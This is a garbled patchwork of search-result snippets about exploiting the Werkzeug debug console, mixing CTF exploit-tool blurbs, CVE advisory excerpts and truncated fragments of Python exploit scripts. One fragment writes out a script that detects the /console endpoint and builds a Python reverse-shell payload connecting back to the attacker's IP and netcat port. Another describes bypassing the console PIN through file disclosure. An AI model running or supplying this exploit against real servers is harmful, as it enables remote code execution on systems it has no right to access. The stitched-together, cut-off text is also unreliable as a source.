WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

You just have to write a python function that leaks a file content and you have your shell :) \xc2\xb7 GitHub · https://www.daehee.com/werkzeug-console-pin-exploit/

People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.

basePort = sys.argv[2] · · #INITIAL CONNECTION WITH THE TARGET.. · print u"\n\u001b[32;1mConnecting To The Target...\u001b[0m\n" · res = requests.get('http://%s:%s/console'% (baseUrl,basePort)) · · #Checking for Werkzeug Console.. · if "Werkzeug powered traceback interpreter" not in res.text: ·

Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-conso...

May 7, 2024 - Exploitability Metrics: Attack Vector: Network · Attack Complexity: High · Privileges Required: None · User Interaction: Required · Scope: Unchanged · Impact Metrics: Confidentiality Impact: High · Integrity Impact: High · Availability Impact: High · For more information on CVSS3 Scores, click here. Suggested Fix · Type: Upgrade version · Origin: GHSA-2g68-c3qc-8985 ·

In this case, we are taking the exploit script a step further and we are relying on subprocess to reuse the HTTP request made through by using curl. Doing this, helps in dynamically getting the victim server information remotely and without relying on python's urllib to make these HTTP requests. Once you find out Werkzeug Console is pin-protected, you need to find a way to get this pin and access the debug console, right?

October 26, 2023 - CVE-2023-46136 - High Severity Vulnerability Vulnerable Library - Werkzeug-2.2.3-py3-none-any.whl The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/f6/f8/9da63c1617ae2a1dec2fbf6412...

February 15, 2023 - Browsers may allow "nameless" cookies that look like =value instead of key=value. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like =__Host-test=bad for another subdomain.

A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like =__Host-test=bad for another subdomain. Werkzeug <= 2.2.2 will parse the cookie =__Host-test=bad as __Host-test=bad.

# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 · · if len(sys.argv) != 5: · print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) · sys.exit(-1) · · · response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) · · if "Werkzeug " not in response.text: ·

Collection of different exploits. Contribute to am0nsec/exploit development by creating an account on GitHub.

August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version：2.1.1

Security vulnerabilities and package health score for pip package werkzeug 2.2.2

February 15, 2023 - CVE-2023-25577 - High Severity Vulnerability Vulnerable Libraries - Werkzeug-2.2.2-py3-none-any.whl, Werkzeug-2.0.3-py3-none-any.whl Werkzeug-2.2.2-py3-none-any.whl The comprehensive WSGI web appli...

May 9, 2024 - Exploitability Metrics: Attack Vector: Network · Attack Complexity: Low · Privileges Required: None · User Interaction: None · Scope: Unchanged · Impact Metrics: Confidentiality Impact: None · Integrity Impact: None · Availability Impact: High · For more information on CVSS3 Scores, click here. Type: Upgrade version · Origin: GHSA-hrfv-mqp8-q5rw · Release Date: 2023-10-25 · Fix Resolution: werkzeug - 2.3.8,3.0.1 ·

January 18, 2024 - To use Exploit Notes locally, run the following command: git clone https://github.com/hdks-bug/exploitnotes.git cd exploitnotes python3 -m venv .venv source .venv/bin/activate pip3 install -r requirements.txt zensical serve

January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%

We cannot provide a description for this page right now